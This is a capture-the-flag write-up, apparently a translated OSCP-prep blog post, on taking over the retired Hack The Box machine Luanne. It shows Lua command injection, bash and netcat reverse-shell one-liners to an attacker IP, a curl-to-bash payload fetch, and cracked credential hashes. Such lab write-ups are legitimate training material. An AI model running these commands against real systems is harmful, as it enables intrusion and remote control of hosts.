OSCP PREPROTİONS – HTB Luanne

Luanne machine is a vulnerable machine with NetBSD operating system among retired machines. After detecting and using these vulnerabilities, we are expected to obtain user and root flags.
We provide network connection with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 22/tcp ssh OpenSSH 8.0, 80/tcp http nginx 1.19.0, 9001/tcp http Medusa httpd 1.12 ports are open.
Since there is no vulnerability from the ssh side, we continue with port 80.
On port 80, we continue enumeration on the browser since the http protocol is serving.

When trying to log in, it constantly asks for credential information, we tried default apros and could not log in.
We tried to turn it off and try
Here it routes to port 3000

Not much of a result here.

Let’s run a directory and file scan with gobustter.
The directory scan returned the /robots.txt file

We went to the robots.txt directory

Here in the /robots.txt file it is told to do harvesting by /weather.

We perform a goboster scan to this directory

We discovered the /forecast directory.
We go to the /forecast directory.

Here it tells us to use city=list in json format, let’s go to the url section here and apply it

It means we can run something on the server here. The cities are listed
Now we have written the cities one by one
When I typed the city of London, it was very detailed.

We continue to obtain this information.
Since it may be associated with port 9001, let’s go to that port

It asks for credential information on this same page. Since Medusa/1.12 is specifically running on this port, let’s Google whether there is a defulat password or not

Entering this information was not successful

When we looked at a different address, it gave us different credentials and we were able to log in with them

showing uptime, processes, memory. here in the process section, the file with the .lua extension that draws our attention

Let’s go and investigate the lua extension file and find out what it is

We see that lua is a programming language, we can run commands on the web service, if we write revershel about lua, maybe we can get shella on the server.
We searched for Lua related revershell on Google

We are trying on the url we saw to get shell.
We get an error that json cannot parse properly.

Let’s try to execute a command by listening in the background with Burpsuite

We can’t run any kind of command here
Let’s see if there is command injection in Lua
os.execute(“id”)
when we try this, it returns the results of the id value

We type our Revershell command and no result is returned
os.execute(“bash -i >& /dev/tcp/10.10.14.13/1234 0>&1”)

Let’s pass a reveshell file here and trigger it with curl
First, we prepare a revershell file as sh, i.e. bash script

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f

Then we provide a web server with python to access this file

Shell is ready to be taken, now the profitable machine needs to take this shell and run it.
We were able to do command injection in the lua machine, now we open burpsuit and access this command with curl
curl+10.10.14.13:8000/shell.sh+|+bash

This is how we were able to buy Shell 😊

This user has restricted authorization

Let’s do local enumeration
Let’s first carefully examine the www folder, since this web service offers

In the .htapsswd file we get a username and hash.
Let’s see from Creacstation if this hash is cracked.

In the .htapsswd file we get a username and hash.
Let’s see from Creacstation if this hash is cracked.

As can be seen the hashi broke as $1$vVVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest

We could not log in because there is no webapi_user user

Here came the credetnail information that he asked us when entering the website, let’s try to log in with this information

We were able to log in
/weather/forecast?city=list
/weather/forecast?city=London
The addresses are the same information we detected in our enumeration part, there was no advantage for us.
We continue with local enumeration. Since it’s sh, we couldn’t run the automatic enumeration tools, which are limited in most cases.
We provide manual enumeration.
We are looking at the running network list

We look at the processes that use these ports

Here we were able to obtain the ssh key.

Now we will make an ssh connection using this ssh key.

The file devel_backup-2020-09-16.tar.gz.enc catches our attention.

We don’t know how to open this file, we are searching on Google

Let’s edit it according to the reference here and print it out

Here we have a different hash value

Let’s break this hash value again with hascat

We cracked the hash value and got the littlebear password
Here I try to enter as a root user, commands such as sudo su do not work because it is an openbsd operating system, we have researched this issue on Google how we can be root dite

We encountered the doas command, let’s try this

As you can see, we were able to get our root flag here.